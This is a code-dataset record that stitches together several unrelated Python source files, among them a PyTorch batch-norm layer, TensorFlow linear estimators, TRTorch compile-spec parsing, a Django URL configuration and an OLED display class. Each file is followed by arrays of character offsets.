:meth:`forward` method.
track_running_stats: See argument ``track_running_stats`` of class
:class:`torch.nn.BatchNorm1d`.
frozen_stats: If ``True``, the layer statistics are frozen at their
initial values of :math:`\gamma = 1` and :math:`\beta = 0`,
i.e., layer activity will not be whitened.
Note, this option requires ``track_running_stats`` to be set to
``False``.
learnable_stats: If ``True``, the layer statistics are initialized
as learnable parameters (:code:`requires_grad=True`).
Note, these extra parameters will be maintained internally and
not added to the :attr:`weights`. Statistics can always be
maintained externally and passed to the :meth:`forward` method.
Note, this option requires ``track_running_stats`` to be set to
``False``.
"""
super(BatchNormLayer, self).__init__()
if learnable_stats:
# FIXME We need our custom stats computation for this.
# The running stats updated by `torch.nn.functional.batch_norm` do
# not allow backpropagation.
# See here on how they are computed:
# https://github.com/pytorch/pytorch/blob/96fe2b4ecbbd02143d95f467655a2d697282ac32/aten/src/ATen/native/Normalization.cpp#L137
raise NotImplementedError('Option "learnable_stats" has not been ' +
'implemented yet!')
if momentum is None:
# If one wants to implement this, then please note that the
# attribute `num_batches_tracked` has to be added. Also, note the
# extra code for computing the momentum value in the forward method
# of class `_BatchNorm`:
# https://pytorch.org/docs/stable/_modules/torch/nn/modules/batchnorm.html#_BatchNorm
raise NotImplementedError('This reimplementation of PyTorch its ' +
'batchnorm layer does not support ' +
'setting "momentum" to None.')
if learnable_stats and track_running_stats:
raise ValueError('Option "track_running_stats" must be set to ' +
'False when enabling "learnable_stats".')
if frozen_stats and track_running_stats:
raise ValueError('Option "track_running_stats" must be set to ' +
'False when enabling "frozen_stats".')
self._num_features = num_features
self._momentum = momentum
self._affine = affine
self._track_running_stats = track_running_stats
self._frozen_stats = frozen_stats
self._learnable_stats = learnable_stats
self.register_buffer('_num_stats', torch.tensor(0, dtype=torch.long))
self._weights = nn.ParameterList()
self._param_shapes = [[num_features], [num_features]]
if affine:
# Gamma
self.register_parameter('scale', nn.Parameter( \
torch.Tensor(num_features), requires_grad=True))
# Beta
self.register_parameter('bias', nn.Parameter( \
torch.Tensor(num_features), requires_grad=True))
self._weights.append(self.scale)
self._weights.append(self.bias)
nn.init.ones_(self.scale)
nn.init.zeros_(self.bias)
elif not learnable_stats:
self._weights = None
if learnable_stats:
# Don't forget to add the new params to `self._weights`.
# Don't forget to add shapes to `self._param_shapes`.
raise NotImplementedError()
elif track_running_stats or frozen_stats:
# Note, in case of frozen stats, we just don't update the stats
# initialized here later on.
self.checkpoint_stats()
else:
mname, vname = self._stats_names(0)
self.register_buffer(mname, None)
self.register_buffer(vname, None)
@property
def weights(self):
"""Getter for read-only attribute :attr:`weights`.
Returns:
A :class:`torch.nn.ParameterList` or ``None``, if no parameters are
internally maintained.
"""
return self._weights
@property
def param_shapes(self):
"""Getter for read-only attribute :attr:`param_shapes`.
Returns:
A list of lists of integers.
"""
return self._param_shapes
@property
def hyper_shapes(self):
"""Getter for read-only attribute :attr:`hyper_shapes`.
Returns:
A list of lists of integers.
"""
# FIXME not implemented attribute. Do we even need the attribute, given
# that all components are individually passed to the forward method?
raise NotImplementedError('Not implemented yet!')
return self._hyper_shapes
@property
def num_stats(self):
"""Getter for read-only attribute :attr:`num_stats`.
Returns:
(int)
"""
return self._num_stats
def forward(self, inputs, running_mean=None, running_var=None, weight=None,
bias=None, stats_id=None):
r"""Apply batch normalization to given layer activations.
Based on the state if this module (attribute :attr:`training`), the
configuration of this layer and the parameters currently passed, the
behavior of this function will be different.
The core of this method still relies on the function
:func:`torch.nn.functional.batch_norm`. In the following we list the
different behaviors of this method based on the context.
**In training mode:**
We first consider the case that this module is in training mode, i.e.,
:meth:`torch.nn.Module.train` has been called.
Usually, during training, the running statistics are not used when
computing the output, instead the statistics computed on the current
batch are used (denoted by *use batch stats* in the table below).
However, the batch statistics are typically updated during training
(denoted by *update running stats* in the table below).
The above described scenario would correspond to passing batch
statistics to the function :func:`torch.nn.functional.batch_norm` and
setting the parameter ``training`` to ``True``.
+----------------------+---------------------+-------------------------+
| **training mode** | **use batch stats** | **update running stats**|
+----------------------+---------------------+-------------------------+
| given stats | Yes | Yes |
+----------------------+---------------------+-------------------------+
| track running stats | Yes | Yes |
+----------------------+---------------------+-------------------------+
| frozen stats | No | No |
+----------------------+---------------------+-------------------------+
| learnable stats | Yes | Yes [1]_ |
+----------------------+---------------------+-------------------------+
|no track running stats| Yes | No |
+----------------------+---------------------+-------------------------+
The meaning of each row in this table is as follows:
- **given stats**: External stats are provided via the parameters
``running_mean`` and ``running_var``.
- **track running stats**: If ``track_running_stats`` was set to
``True`` in the constructor and no stats were given.
- **frozen stats**: If ``frozen_stats`` was set to ``True`` in the
constructor and no stats were given.
- **learnable stats**: If ``learnable_stats`` was set to ``True`` in
the constructor and no stats were given.
- **no track running stats**: If none of the above options apply,
then the statistics will always be computed from the current batch
(also in eval mode).
.. note::
If provided, running stats specified via ``running_mean`` and
``running_var`` always have priority.
.. [1] We use a custom implementation to update the running statistics,
that is compatible with backpropagation.
**In evaluation mode:**
We now consider the case that this module is in evaluation mode, i.e.,
:meth:`torch.nn.Module.eval` has been called.
Here is the same table as above just for the evaluation mode.
+----------------------+---------------------+-------------------------+
| **evaluation mode** | **use batch stats** | **update running stats**|
+----------------------+---------------------+-------------------------+
| track running stats | No | No |
+----------------------+---------------------+-------------------------+
| frozen stats | No | No |
+----------------------+---------------------+-------------------------+
| learnable stats | No | No |
+----------------------+---------------------+-------------------------+
| given stats | No | No |
+----------------------+---------------------+-------------------------+
|no track running stats| Yes | No |
+----------------------+---------------------+-------------------------+
Args:
inputs: The inputs to the batchnorm layer.
running_mean (optional): Running mean stats
:math:`m_{\text{stats}}`. This option has priority, i.e., any
internally maintained statistics are ignored if given.
.. note::
If specified, then ``running_var`` also has to be specified.
running_var (optional): Similar to option ``running_mean``, but for
the running variance stats :math:`v_{\text{stats}}`
.. note::
If specified, then ``running_mean`` also has to be
specified.
weight (optional): The gain factors :math:`\gamma`. If given, any
internal gains are ignored. If option ``affine`` was set to
``False`` in the constructor and this option remains ``None``,
then no gains are multiplied to the "whitened" inputs.
bias (optional): The behavior of this option is similar to option
``weight``, except that this option represents the offsets
:math:`\beta`.
stats_id: This argument is optional except if multiple running
stats checkpoints exist (i.e., attribute :attr:`num_stats` is
greater than 1) and no running stats have been provided to this
method.
.. note::
This argument is ignored if running stats have been passed.
Returns:
The layer activation ``inputs`` after batch-norm has been applied.
"""
assert (running_mean is None and running_var is None or \
running_mean is not None and running_var is not None)
if not self._affine:
if weight is None or bias is None:
raise ValueError('Layer was generated in non-affine mode. ' +
'Therefore, arguments "weight" and "bias" ' +
'may not be None.')
# No gains given but we have internal gains.
# Otherwise, if no gains are given we leave `weight` as None.
if weight is None and self._affine:
weight = self.scale
if bias is None and self._affine:
bias = self.bias
stats_given = running_mean is not None
if (running_mean is None or running_var is None):
if stats_id is None and self.num_stats > 1:
raise ValueError('Parameter "stats_id" is not defined but ' +
'multiple running stats are available.')
elif self._track_running_stats:
if stats_id is None:
stats_id = 0
assert (stats_id < self.num_stats)
rm, rv = self.get_stats(stats_id)
if running_mean is None:
running_mean = rm
if running_var is None:
running_var = rv
elif stats_id is not None:
warn('Parameter "stats_id" is ignored since running stats have ' +
'been provided.')
momentum = self._momentum
if stats_given or self._track_running_stats:
return F.batch_norm(inputs, running_mean, running_var,
weight=weight, bias=bias,
training=self.training, momentum=momentum)
if self._learnable_stats:
raise NotImplementedError()
if self._frozen_stats:
return F.batch_norm(inputs, running_mean, running_var,
weight=weight, bias=bias, training=False)
# TODO implement scale and shift here. Note, that `running_mean` and
# `running_var` are always 0 and 1, resp. Therefore, the call to
# `F.batch_norm` is a waste of computation.
# ret = inputs
# if weight is not None:
# # Multiply `ret` with `weight` such that dimensions are
# # respected.
# pass
# if bias is not None:
# # Add `bias` to modified `ret` such that dimensions are
# # respected.
# pass
# return ret
else:
assert (not self._track_running_stats)
# Always compute statistics based on current batch.
return F.batch_norm(inputs, None, None, weight=weight, bias=bias,
training=True, momentum=momentum)
def checkpoint_stats(self, device=None):
"""Buffers for a new set of running stats will be registered.
Calling this function will also increment the attribute
:attr:`num_stats`.
Args:
device (optional): If not provided, the newly created statistics
will either be moved to the device of the most recent statistics
or to CPU if no prior statistics exist.
"""
assert (self._track_running_stats or \
self._frozen_stats and self._num_stats == 0)
if device is None:
if self.num_stats > 0:
mname_old, _ = self._stats_names(self._num_stats - 1)
device = getattr(self, mname_old).device
if self._learnable_stats:
raise NotImplementedError()
mname, vname = self._stats_names(self._num_stats)
self._num_stats += 1
self.register_buffer(mname, torch.zeros(self._num_features,
device=device))
self.register_buffer(vname, torch.ones(self._num_features,
device=device))
def get_stats(self, stats_id=None):
"""Get a set of running statistics (means and variances).
Args:
stats_id (optional): ID of stats. If not provided, the most recent
stats are returned.
Returns:
(tuple): Tuple containing:
- **running_mean**
- **running_var**
"""
if stats_id is None:
stats_id = self.num_stats - 1
assert (stats_id < self.num_stats)
mname, vname = self._stats_names(stats_id)
running_mean = getattr(self, mname)
running_var = getattr(self, vname)
return running_mean, running_var
def _stats_names(self, stats_id):
"""Get the buffer names for mean and variance statistics depending on
the ``stats_id``, i.e., the ID of the stats checkpoint.
Args:
stats_id: ID of stats.
Returns:
(tuple): Tuple containing:
- **mean_name**
- **var_name**
"""
mean_name = 'mean_%d' % stats_id
var_name = 'var_%d' % stats_id
return mean_name, var_name
if __name__ == '__main__':
pass
| [
[
[
2305,
2309
],
[
19821,
19825
]
],
[
[
2318,
2323
],
[
9674,
9679
],
[
9696,
9701
],
[
9932,
9937
],
[
10076,
10081
],
[
22271,
22276
],
[
22403,
22408
]
],
[
[
2331,
2345
],
[
2401,
2403
],
[
9734,
9736
],
[
9900,
9902
],
[
10044,
10046
],
[
10228,
10230
],
[
10266,
10268
]
],
[
[
2353,
2377
],
[
20031,
20032
],
[
20338,
20339
],
[
21199,
21200
]
],
[
[
2386,
2400
],
[
7783,
7797
]
]
] |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear Estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.learn.python.learn.estimators import _sklearn
from tensorflow.contrib.learn.python.learn.estimators import dnn_linear_combined
from tensorflow.contrib.learn.python.learn.estimators import sdca_optimizer
from tensorflow.contrib.learn.python.learn.estimators.base import DeprecatedMixin
from tensorflow.python.framework import ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.platform import tf_logging as logging
# TODO(b/29580537): Replace with @changing decorator.
def _changing(feature_columns):
if feature_columns is not None:
return
logging.warn(
"Change warning: `feature_columns` will be required after 2016-08-01.\n"
"Instructions for updating:\n"
"Pass `tf.contrib.learn.infer_real_valued_columns_from_input(x)` or"
" `tf.contrib.learn.infer_real_valued_columns_from_input_fn(input_fn)`"
" as `feature_columns`, where `x` or `input_fn` is your argument to"
" `fit`, `evaluate`, or `predict`.")
class LinearClassifier(dnn_linear_combined.DNNLinearCombinedClassifier):
"""Linear classifier model.
Train a linear model to classify instances into one of multiple possible
classes. When number of possible classes is 2, this is binary classification.
Example:
```python
education = sparse_column_with_hash_bucket(column_name="education",
hash_bucket_size=1000)
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
education_x_occupation = crossed_column(columns=[education, occupation],
hash_bucket_size=10000)
# Estimator using the default optimizer.
estimator = LinearClassifier(
feature_columns=[occupation, education_x_occupation])
# Or estimator using the FTRL optimizer with regularization.
estimator = LinearClassifier(
feature_columns=[occupation, education_x_occupation],
optimizer=tf.train.FtrlOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001
))
# Or estimator using the SDCAOptimizer.
estimator = LinearClassifier(
feature_columns=[occupation, education_x_occupation],
optimizer=tf.contrib.learn.SDCAOptimizer(
example_id_column='example_id',
symmetric_l2_regularization=2.0
))
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
* if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* for each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `RealValuedColumn`, a feature with `key=column.name`
whose `value` is a `Tensor`.
- if `feature_columns` is `None`, then `input` must contains only real
valued `Tensor`.
"""
def __init__(self,
feature_columns=None,
model_dir=None,
n_classes=2,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
enable_centered_bias=True,
config=None):
"""Construct a `LinearClassifier` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph and etc.
n_classes: number of target classes. Default is binary classification.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: The optimizer used to train the model. If specified, it should
be either an instance of `tf.Optimizer` or the SDCAOptimizer. If `None`,
the Ftrl optimizer will be used.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
config: `RunConfig` object to configure the runtime settings.
Returns:
A `LinearClassifier` estimator.
"""
_changing(feature_columns)
super(LinearClassifier, self).__init__(
model_dir=model_dir,
n_classes=n_classes,
weight_column_name=weight_column_name,
linear_feature_columns=feature_columns,
linear_optimizer=optimizer,
gradient_clip_norm=gradient_clip_norm,
enable_centered_bias=enable_centered_bias,
config=config)
self._feature_columns_inferred = False
# TODO(b/29580537): Remove feature_columns inference.
def _validate_linear_feature_columns(self, features):
if self._linear_feature_columns is None:
self._linear_feature_columns = layers.infer_real_valued_columns(features)
self._feature_columns_inferred = True
elif self._feature_columns_inferred:
this_dict = {c.name: c for c in self._linear_feature_columns}
that_dict = {
c.name: c for c in layers.infer_real_valued_columns(features)
}
if this_dict != that_dict:
raise ValueError(
"Feature columns, expected %s, got %s.", (this_dict, that_dict))
def _get_train_ops(self, features, targets):
"""See base class."""
self._validate_linear_feature_columns(features)
if not isinstance(self._linear_optimizer, sdca_optimizer.SDCAOptimizer):
return super(LinearClassifier, self)._get_train_ops(features, targets)
# SDCA currently supports binary classification only.
if self._target_column.num_label_columns > 2:
raise ValueError(
"SDCA does not currently support multi-class classification.")
global_step = contrib_variables.get_global_step()
assert global_step
logits, columns_to_variables, _ = layers.weighted_sum_from_feature_columns(
columns_to_tensors=features,
feature_columns=self._linear_feature_columns,
num_outputs=self._target_column.num_label_columns,
weight_collections=[self._linear_weight_collection],
scope="linear")
with ops.control_dependencies([self._centered_bias()]):
loss = self._target_column.loss(logits, targets, features)
logging_ops.scalar_summary("loss", loss)
train_ops = self._linear_optimizer.get_train_step(
self._linear_feature_columns, self._target_column.weight_column_name,
"logistic_loss", features, targets, columns_to_variables, global_step)
return train_ops, loss
def _get_eval_ops(self, features, targets, metrics=None):
self._validate_linear_feature_columns(features)
return super(LinearClassifier, self)._get_eval_ops(
features, targets, metrics)
def _get_predict_ops(self, features):
"""See base class."""
self._validate_linear_feature_columns(features)
return super(LinearClassifier, self)._get_predict_ops(features)
@property
def weights_(self):
return self.linear_weights_
@property
def bias_(self):
return self.linear_bias_
class LinearRegressor(dnn_linear_combined.DNNLinearCombinedRegressor):
"""Linear regressor model.
Train a linear regression model to predict target variable value given
observation of feature values.
Example:
```python
education = sparse_column_with_hash_bucket(column_name="education",
hash_bucket_size=1000)
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
education_x_occupation = crossed_column(columns=[education, occupation],
hash_bucket_size=10000)
estimator = LinearRegressor(
feature_columns=[occupation, education_x_occupation])
# Input builders
def input_fn_train: # returns x, y
...
def input_fn_eval: # returns x, y
...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a KeyError:
* if `weight_column_name` is not `None`:
key=weight_column_name, value=a `Tensor`
* for column in `feature_columns`:
- if isinstance(column, `SparseColumn`):
key=column.name, value=a `SparseTensor`
- if isinstance(column, `RealValuedColumn`):
key=column.name, value=a `Tensor`
- if `feature_columns` is `None`:
input must contains only real valued `Tensor`.
"""
def __init__(self,
feature_columns=None,
model_dir=None,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
enable_centered_bias=True,
target_dimension=1,
config=None):
"""Construct a `LinearRegressor` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph, etc.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: An instance of `tf.Optimizer` used to train the model. If
`None`, will use an Ftrl optimizer.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
target_dimension: dimension of the target for multilabels.
config: `RunConfig` object to configure the runtime settings.
Returns:
A `LinearRegressor` estimator.
"""
_changing(feature_columns)
super(LinearRegressor, self).__init__(
model_dir=model_dir,
weight_column_name=weight_column_name,
linear_feature_columns=feature_columns,
linear_optimizer=optimizer,
gradient_clip_norm=gradient_clip_norm,
enable_centered_bias=enable_centered_bias,
target_dimension=target_dimension,
config=config)
self._feature_columns_inferred = False
# TODO(b/29580537): Remove feature_columns inference.
def _validate_linear_feature_columns(self, features):
if self._linear_feature_columns is None:
self._linear_feature_columns = layers.infer_real_valued_columns(features)
self._feature_columns_inferred = True
elif self._feature_columns_inferred:
this_dict = {c.name: c for c in self._linear_feature_columns}
that_dict = {
c.name: c for c in layers.infer_real_valued_columns(features)
}
if this_dict != that_dict:
raise ValueError(
"Feature columns, expected %s, got %s.", (this_dict, that_dict))
def _get_train_ops(self, features, targets):
"""See base class."""
if isinstance(self._linear_optimizer, sdca_optimizer.SDCAOptimizer):
raise ValueError("SDCAOptimizer does not currently support regression.")
self._validate_linear_feature_columns(features)
return super(LinearRegressor, self)._get_train_ops(features, targets)
def _get_eval_ops(self, features, targets, metrics=None):
self._validate_linear_feature_columns(features)
return super(LinearRegressor, self)._get_eval_ops(
features, targets, metrics)
def _get_predict_ops(self, features):
"""See base class."""
self._validate_linear_feature_columns(features)
return super(LinearRegressor, self)._get_predict_ops(features)
@property
def weights_(self):
return self.linear_weights_
@property
def bias_(self):
return self.linear_bias_
# TensorFlowLinearRegressor and TensorFlowLinearClassifier are deprecated.
class TensorFlowLinearRegressor(DeprecatedMixin, LinearRegressor,
_sklearn.RegressorMixin):
pass
class TensorFlowLinearClassifier(DeprecatedMixin, LinearClassifier,
_sklearn.ClassifierMixin):
pass
TensorFlowRegressor = TensorFlowLinearRegressor
TensorFlowClassifier = TensorFlowLinearClassifier
| [
[
[
739,
754
]
],
[
[
778,
786
]
],
[
[
810,
824
]
],
[
[
857,
863
],
[
6389,
6395
],
[
6634,
6640
],
[
7423,
7429
],
[
12281,
12287
],
[
12526,
12532
]
],
[
[
916,
946
],
[
7325,
7342
]
],
[
[
1008,
1016
],
[
13758,
13766
],
[
13894,
13902
]
],
[
[
1078,
1097
],
[
1968,
1987
],
[
8655,
8674
]
],
[
[
1159,
1173
],
[
6993,
7007
],
[
12829,
12843
]
],
[
[
1240,
1255
],
[
13692,
13707
],
[
13826,
13841
]
],
[
[
1296,
1299
],
[
7709,
7712
]
],
[
[
1334,
1345
],
[
7829,
7840
]
],
[
[
1385,
1406
],
[
1542,
1549
]
],
[
[
1467,
1476
],
[
5770,
5779
],
[
11649,
11658
]
],
[
[
1951,
1967
],
[
13843,
13859
],
[
5807,
5823
],
[
7043,
7059
],
[
8241,
8257
],
[
8452,
8468
]
],
[
[
8639,
8654
],
[
13709,
13724
],
[
11686,
11701
],
[
13008,
13023
],
[
13195,
13210
],
[
13405,
13420
]
],
[
[
13666,
13691
],
[
13952,
13977
]
],
[
[
13799,
13825
],
[
14001,
14027
]
],
[
[
13930,
13949
]
],
[
[
13978,
13998
]
]
] |
from typing import List, Dict, Any
import torch
import trtorch._C
from trtorch import _types
def _supported_input_size_type(input_size: Any) -> bool:
if isinstance(input_size, torch.Size):
return True
elif isinstance(input_size, tuple):
return True
elif isinstance(input_size, list):
return True
else:
raise TypeError(
"Input sizes for inputs are required to be a List, tuple or torch.Size or a Dict of three sizes (min, opt, max), found type: "
+ str(type(input_size)))
def _parse_input_ranges(input_sizes: List) -> List:
if any(not isinstance(i, dict) and not _supported_input_size_type(i) for i in input_sizes):
raise KeyError("An input size must either be a static size or a range of three sizes (min, opt, max) as Dict")
parsed_input_sizes = []
for i in input_sizes:
if isinstance(i, dict):
if all(k in i for k in ["min", "opt", "min"]):
in_range = trtorch._C.InputRange()
in_range.min = i["min"]
in_range.opt = i["opt"]
in_range.max = i["max"]
parsed_input_sizes.append(in_range)
elif "opt" in i:
in_range = trtorch._C.InputRange()
in_range.min = i["opt"]
in_range.opt = i["opt"]
in_range.max = i["opt"]
parsed_input_sizes.append(in_range)
else:
raise KeyError(
"An input size must either be a static size or a range of three sizes (min, opt, max) as Dict")
elif isinstance(i, list):
in_range = trtorch._C.InputRange()
in_range.min = i
in_range.opt = i
in_range.max = i
parsed_input_sizes.append(in_range)
elif isinstance(i, tuple):
in_range = trtorch._C.InputRange()
in_range.min = list(i)
in_range.opt = list(i)
in_range.max = list(i)
parsed_input_sizes.append(in_range)
return parsed_input_sizes
def _parse_op_precision(precision: Any) -> _types.dtype:
if isinstance(precision, torch.dtype):
if precision == torch.int8:
return _types.dtype.int8
elif precision == torch.half:
return _types.dtype.half
elif precision == torch.float:
return _types.dtype.float
else:
raise TypeError("Provided an unsupported dtype as operating precision (support: int8, half, float), got: " +
str(precision))
elif isinstance(precision, _types.DataTypes):
return precision
else:
raise TypeError("Op precision type needs to be specified with a torch.dtype or a trtorch.dtype, got: " +
str(type(precision)))
def _parse_device_type(device: Any) -> _types.DeviceType:
if isinstance(device, torch.device):
if device.type == 'cuda':
return _types.DeviceType.gpu
else:
ValueError("Got a device type other than GPU or DLA (type: " + str(device.type) + ")")
elif isinstance(device, _types.DeviceType):
return device
elif isinstance(device, str):
if device == "gpu" or device == "GPU":
return _types.DeviceType.gpu
elif device == "dla" or device == "DLA":
return _types.DeviceType.dla
else:
ValueError("Got a device type other than GPU or DLA (type: " + str(device) + ")")
else:
raise TypeError("Device specification must be of type torch.device, string or trtorch.DeviceType, but got: " +
str(type(device)))
def _parse_compile_spec(compile_spec: Dict[str, Any]) -> trtorch._C.CompileSpec:
info = trtorch._C.CompileSpec()
if "input_shapes" not in compile_spec:
raise KeyError(
"Input shapes for inputs are required as a List, provided as either a static sizes or a range of three sizes (min, opt, max) as Dict"
)
info.input_ranges = _parse_input_ranges(compile_spec["input_shapes"])
if "op_precision" in compile_spec:
info.op_precision = _parse_op_precision(compile_spec["op_precision"])
if "refit" in compile_spec:
assert isinstance(compile_spec["refit"], bool)
info.refit = compile_spec["refit"]
if "debug" in compile_spec:
assert isinstance(compile_spec["debug"], bool)
info.debug = compile_spec["debug"]
if "strict_types" in compile_spec:
assert isinstance(compile_spec["strict_types"], bool)
info.strict_types = compile_spec["strict_types"]
if "allow_gpu_fallback" in compile_spec:
assert isinstance(compile_spec["allow_gpu_fallback"], bool)
info.allow_gpu_fallback = compile_spec["allow_gpu_fallback"]
if "device_type" in compile_spec:
info.device = _parse_device_type(compile_spec["device_type"])
if "capability" in compile_spec:
assert isinstance(compile_spec["capability"], _types.EngineCapability)
info.capability = compile_spec["capability"]
if "num_min_timing_iters" in compile_spec:
assert type(compile_spec["num_min_timing_iters"]) is int
info.num_min_timing_iters = compile_spec["num_min_timing_iters"]
if "num_avg_timing_iters" in compile_spec:
assert type(compile_spec["num_avg_timing_iters"]) is int
info.num_avg_timing_iters = compile_spec["num_avg_timing_iters"]
if "workspace_size" in compile_spec:
assert type(compile_spec["workspace_size"]) is int
info.workspace_size = compile_spec["workspace_size"]
if "max_batch_size" in compile_spec:
assert type(compile_spec["max_batch_size"]) is int
info.max_batch_size = compile_spec["max_batch_size"]
return info
def TensorRTCompileSpec(compile_spec: Dict[str, Any]):
"""
Utility to create a formated spec dictionary for using the PyTorch TensorRT backend
Args:
compile_spec (dict): Compilation settings including operating precision, target device, etc.
One key is required which is ``input_shapes``, describing the input sizes or ranges for inputs
to the graph. All other keys are optional. Entries for each method to be compiled.
.. code-block:: py
CompileSpec = {
"forward" : trtorch.TensorRTCompileSpec({
"input_shapes": [
(1, 3, 224, 224), # Static input shape for input #1
{
"min": (1, 3, 224, 224),
"opt": (1, 3, 512, 512),
"max": (1, 3, 1024, 1024)
} # Dynamic input shape for input #2
],
"op_precision": torch.half, # Operating precision set to FP16
"refit": False, # enable refit
"debug": False, # enable debuggable engine
"strict_types": False, # kernels should strictly run in operating precision
"allow_gpu_fallback": True, # (DLA only) Allow layers unsupported on DLA to run on GPU
"device": torch.device("cuda"), # Type of device to run engine on (for DLA use trtorch.DeviceType.DLA)
"capability": trtorch.EngineCapability.DEFAULT, # Restrict kernel selection to safe gpu kernels or safe dla kernels
"num_min_timing_iters": 2, # Number of minimization timing iterations used to select kernels
"num_avg_timing_iters": 1, # Number of averaging timing iterations used to select kernels
"workspace_size": 0, # Maximum size of workspace given to TensorRT
"max_batch_size": 0, # Maximum batch size (must be >= 1 to be set, 0 means not set)
})
}
Input Sizes can be specified as torch sizes, tuples or lists. Op precisions can be specified using
torch datatypes or trtorch datatypes and you can use either torch devices or the trtorch device type enum
to select device type.
Returns:
torch.classes.tensorrt.CompileSpec: List of methods and formated spec objects to be provided to ``torch._C._jit_to_tensorrt``
"""
parsed_spec = _parse_compile_spec(compile_spec)
backend_spec = torch.classes.tensorrt.CompileSpec()
for i in parsed_spec.input_ranges:
ir = torch.classes.tensorrt.InputRange()
ir.set_min(i.min)
ir.set_opt(i.opt)
ir.set_max(i.max)
backend_spec.append_input_range(ir)
backend_spec.set_op_precision(int(parsed_spec.op_precision))
backend_spec.set_refit(parsed_spec.refit)
backend_spec.set_debug(parsed_spec.debug)
backend_spec.set_refit(parsed_spec.refit)
backend_spec.set_strict_types(parsed_spec.strict_types)
backend_spec.set_allow_gpu_fallback(parsed_spec.allow_gpu_fallback)
backend_spec.set_device(int(parsed_spec.device))
backend_spec.set_capability(int(parsed_spec.capability))
backend_spec.set_num_min_timing_iters(parsed_spec.num_min_timing_iters)
backend_spec.set_num_avg_timing_iters(parsed_spec.num_avg_timing_iters)
backend_spec.set_workspace_size(parsed_spec.workspace_size)
backend_spec.set_max_batch_size(parsed_spec.max_batch_size)
return backend_spec
| [
[
[
19,
23
],
[
593,
597
],
[
584,
588
]
],
[
[
25,
29
],
[
3731,
3735
],
[
5862,
5866
]
],
[
[
31,
34
],
[
138,
141
],
[
2125,
2128
],
[
2873,
2876
],
[
3741,
3744
],
[
5872,
5875
]
],
[
[
42,
47
],
[
182,
187
],
[
2176,
2181
],
[
2214,
2219
],
[
2289,
2294
],
[
2364,
2369
],
[
2926,
2931
],
[
8483,
8488
],
[
8573,
8578
]
],
[
[
55,
65
],
[
988,
995
],
[
1241,
1248
],
[
1662,
1669
],
[
1880,
1887
],
[
3750,
3757
],
[
3785,
3792
]
],
[
[
86,
92
],
[
2133,
2139
],
[
2245,
2251
],
[
2320,
2326
],
[
2396,
2402
],
[
2626,
2632
],
[
2881,
2887
],
[
2994,
3000
],
[
3157,
3163
],
[
3299,
3305
],
[
3389,
3395
],
[
5031,
5037
]
],
[
[
99,
125
],
[
643,
669
]
],
[
[
551,
570
],
[
4058,
4077
]
],
[
[
2094,
2113
],
[
4176,
4195
]
],
[
[
2846,
2864
],
[
4891,
4909
]
],
[
[
3697,
3716
],
[
8429,
8448
]
],
[
[
5828,
5847
]
]
] |
from django.conf.urls import patterns, url
urlpatterns = patterns('appointments.views',
url(r'^appointment/(?P<practice_id>\d+)/$', 'appointment_form', name='appointment_form'),
url(r'^appointment/created/(?P<practice_id>\d+)/$', 'appointment_created', name='appointment_created'),
)
| [
[
[
29,
37
],
[
59,
67
]
],
[
[
39,
42
],
[
94,
97
],
[
188,
191
]
],
[
[
45,
56
]
]
] |
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from rotary_class import RotaryEncoder
class Display():
def __init__(self, disp):
self.disp = disp
self.dimensions = (disp.width, disp.height)
self.image = Image.new('1', self.dimensions)
self.draw = ImageDraw.Draw(self.image)
self.font = ImageFont.truetype("./DejaVuSansMono.ttf", 10)
def display_clear(self):
self.draw.rectangle((0, 0) + self.dimensions, outline = 0, fill = 0)
def init_display(self):
self.disp.begin()
self.disp.clear()
self.disp.display()
self.display_clear()
self.disp.image(self.image)
self.disp.display()
def draw_rows(self, rows, inv_col):
self.display_clear()
for idx, row in enumerate(rows):
if inv_col == idx:
self.draw.rectangle([(0, 10 * idx), (10 * idx + self.dimensions[0], 1 + 10 * idx + 10)], outline = 0, fill = 255)
self.draw.text((1, 10 * idx), row, font = self.font, fill = 0)
else:
